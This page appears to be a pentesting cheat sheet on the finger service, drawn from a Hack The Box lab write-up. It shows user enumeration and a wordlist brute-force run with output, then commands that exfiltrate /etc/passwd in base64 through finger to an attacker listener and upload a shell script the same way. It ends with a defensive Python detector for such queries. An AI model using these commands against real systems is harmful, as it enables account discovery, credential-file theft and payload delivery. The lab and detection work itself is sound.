# Pentesting Finger

### Overview:

* The [finger](https://en.wikipedia.org/wiki/Finger_protocol) daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged-in users. It can also provide details about a specific user, including when they last logged in and from where.
* Credit: <https://0xdf.gitlab.io/2018/09/29/htb-sunday.html>

```
PORT      STATE SERVICE   VERSION
79/tcp    open  finger    Sun Solaris fingerd
```

* Finger is an exceedingly old protocol that is very rarely in use today.
* Nmap results can show logged-in users:

```
| finger: Login       Name               TTY         Idle    When    Where\x0D
| sunny    sunny                 pts/1            Thu 14:52  10.10.14.245        \x0D
```

### Check for logged in users

```
finger @10.10.10.76
No one logged on
```

### Check for details on a user

```
finger jack@10.10.10.76
jack                  ???
# ^ user does not exist
finger root@10.10.10.76
Login       Name               TTY         Idle    When    Where
root     Super-User            console      <Oct 14 10:28>
# ^ user exists and is logged in
finger ikeuser@10.10.10.76
Login       Name               TTY         Idle    When    Where
ikeuser  IKE Admin                          < .  .  .  . >
# ^ user exists but is not logged in
```

### Bruteforce Users

If finger returns no logged-in users, we can try to brute-force usernames. We’ll use the [finger-user-enum.pl](http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz) script from pentestmonkey.

```
root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Thu Sep 27 17:39:02 2018 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..uucp     uucp Admin                         < .  .  .  . >..nuucp    uucp Admin                         < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..listen   Network Admin                      < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..jo                    ???..ann                   ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin         
```

### Finger for File Transfers

While working on this post, I was checking out [gtfobins](https://gtfobins.github.io/), and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally:

```
root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5
[10.10.14.5]
```

```
root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd
listening on [any] 79 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768

root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
...[snip]...
```

You can upload files to a target machine as well:

```
root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79
```

```
root@sunday:~# finger x@10.10.14.5 > shell.b64
```
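Both the username brute force and the file-transfer trick above are visible in the finger query line itself, so a sensor on TCP/79 can flag them. The following is an added example, not code from the original post or from finger-user-enum; the record layout, the thresholds and the function names are assumptions, and the sample records are constructed.

```python
import base64
import re
from collections import defaultdict

# Constructed sensor records (assumed layout): (epoch secs, client IP, raw TCP/79 query).
SAMPLE = [
    (100, "192.0.2.10", b"\r\n"),                      # list logged-in users
    (101, "192.0.2.10", b"root\r\n"),                  # single lookup
    *[(200 + i, "192.0.2.66", n + b"\r\n")             # wordlist-style burst
      for i, n in enumerate([b"access", b"admin", b"bin", b"line", b"jack"])],
    (300, "192.0.2.77",                                # file content as "username"
     base64.b64encode(b"root:x:0:0:Super-User:/root:/usr/bin/bash\n") + b"\r\n"),
]

MAX_NAME = 32        # assumed ceiling for a legitimate login name
ENUM_THRESHOLD = 5   # distinct names from one client ...
WINDOW = 60          # ... within this many seconds
B64 = re.compile(rb"[A-Za-z0-9+/\r\n]+={0,2}")

def username(raw: bytes) -> bytes:
    """Extract the user part of an RFC 1288 query line ([/W] [user][@host])."""
    q = raw.strip()
    if q[:2].upper() == b"/W":
        q = q[2:].strip()
    return q.split(b"@", 1)[0]

def classify_query(raw: bytes) -> str:
    """Return 'list', 'lookup', 'oversized' or 'oversized-base64'."""
    user = username(raw)
    if not user:
        return "list"
    if len(user) > MAX_NAME:
        return "oversized-base64" if B64.fullmatch(user) else "oversized"
    return "lookup"

def enumeration_sources(records) -> set:
    """Clients that looked up >= ENUM_THRESHOLD distinct names inside WINDOW."""
    recent, flagged = defaultdict(list), set()
    for ts, ip, raw in sorted(records, key=lambda r: r[0]):
        if classify_query(raw) != "lookup":
            continue
        recent[ip] = [(t, n) for t, n in recent[ip] if ts - t <= WINDOW]
        recent[ip].append((ts, username(raw)))
        if len({n for _, n in recent[ip]}) >= ENUM_THRESHOLD:
            flagged.add(ip)
    return flagged

if __name__ == "__main__":
    for ts, ip, raw in SAMPLE:
        print(ts, ip, classify_query(raw))
    print("enumeration sources:", enumeration_sources(SAMPLE))
```

For the exfiltration case the query leaves the compromised host, so the records to inspect are outbound connections to port 79, which on most networks should not exist at all.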

